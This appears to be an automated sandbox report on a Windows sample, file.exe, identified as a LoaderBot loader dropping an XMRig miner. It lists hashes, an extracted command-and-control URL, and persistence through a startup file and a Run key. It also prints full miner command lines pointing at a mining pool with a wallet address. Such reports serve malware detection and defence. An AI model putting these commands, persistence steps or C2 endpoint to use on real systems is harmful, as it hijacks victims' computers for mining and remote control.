Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
13-05-2023 17:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
2.7MB
-
MD5
bd83b22d90836c81047b081dcbacb63d
-
SHA1
ce52554f5bbd0e26332309166a2912609797f8b6
-
SHA256
5bc457579941e276a1ad34f285a12d4a40febb92cafd37ac0ab8c476c240912a
-
SHA512
8025ca796c9273fe5e6fb3e1e1481d63bce796462ebae24857d8aae01bc74c9634bdb509c4f57f23c0523005f89f8eb78f827e34a65cce8502c994494aa5b1c0
-
SSDEEP
49152:TFS3NYgv3IsJks7JFsaaq7VZbAMS9IeD/P/sXZYkZ4jh+:TYbv3Isms1kq7DMFNTkqkZQh+
Malware Config
Extracted
loaderbot
https://sh4453464.c.had.su/cmd.php
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/2568-144-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot -
XMRig Miner payload 16 IoCs
resource yara_rule behavioral2/memory/3896-162-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5044-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5044-169-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5044-170-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5044-171-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/5044-174-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-179-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-180-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-181-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-184-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-187-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-188-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-189-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-190-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-191-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/2036-192-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation file.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url file.exe -
Executes dropped EXE 3 IoCs
pid Process 3896 Driver.exe 5044 Driver.exe 2036 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\file.exe" file.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4484 set thread context of 2568 4484 file.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3412 3896 WerFault.exe 93 4768 5044 WerFault.exe 97 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe 2568 file.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 668 Process not Found 668 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2568 file.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2568 file.exe Token: SeLockMemoryPrivilege 3896 Driver.exe Token: SeLockMemoryPrivilege 3896 Driver.exe Token: SeLockMemoryPrivilege 5044 Driver.exe Token: SeLockMemoryPrivilege 5044 Driver.exe Token: SeLockMemoryPrivilege 2036 Driver.exe Token: SeLockMemoryPrivilege 2036 Driver.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 4484 wrote to memory of 2568 4484 file.exe 91 PID 2568 wrote to memory of 3896 2568 file.exe 93 PID 2568 wrote to memory of 3896 2568 file.exe 93 PID 2568 wrote to memory of 5044 2568 file.exe 97 PID 2568 wrote to memory of 5044 2568 file.exe 97 PID 2568 wrote to memory of 2036 2568 file.exe 101 PID 2568 wrote to memory of 2036 2568 file.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\file.exe"{path}"2⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4935xbCqwWU1Kskmfu796NjQVuLDZAR4xdvf7fe2p9w3XVkqbRHPR5ELemPeGJJhVWGxjeLuvZqf8ZVFPabUB5CTNSBG2RV -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3896 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3896 -s 7604⤵
- Program crash
PID:3412
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4935xbCqwWU1Kskmfu796NjQVuLDZAR4xdvf7fe2p9w3XVkqbRHPR5ELemPeGJJhVWGxjeLuvZqf8ZVFPabUB5CTNSBG2RV -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5044 -s 8564⤵
- Program crash
PID:4768
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4935xbCqwWU1Kskmfu796NjQVuLDZAR4xdvf7fe2p9w3XVkqbRHPR5ELemPeGJJhVWGxjeLuvZqf8ZVFPabUB5CTNSBG2RV -p x -k -v=0 --donate-level=1 -t 23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 3896 -ip 38961⤵PID:2768
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 396 -p 5044 -ip 50441⤵PID:2116
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53ae5fa36d6c5cf135fb14702c5777bc0
SHA186a5aa45d96748084ace87493debdf3d329cd521
SHA2561f05b6335396291c2e7a378aa96b741374541807a1dbd94b74025f43984e917c
SHA5127fe99728c09b6d832b9b06c60a962437ffc7f6175efe047b2a1c1f830b01469558055e3a032aa8c92e9e026f07efcc02e00236f9b9e02461908bcfce9272daa3
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322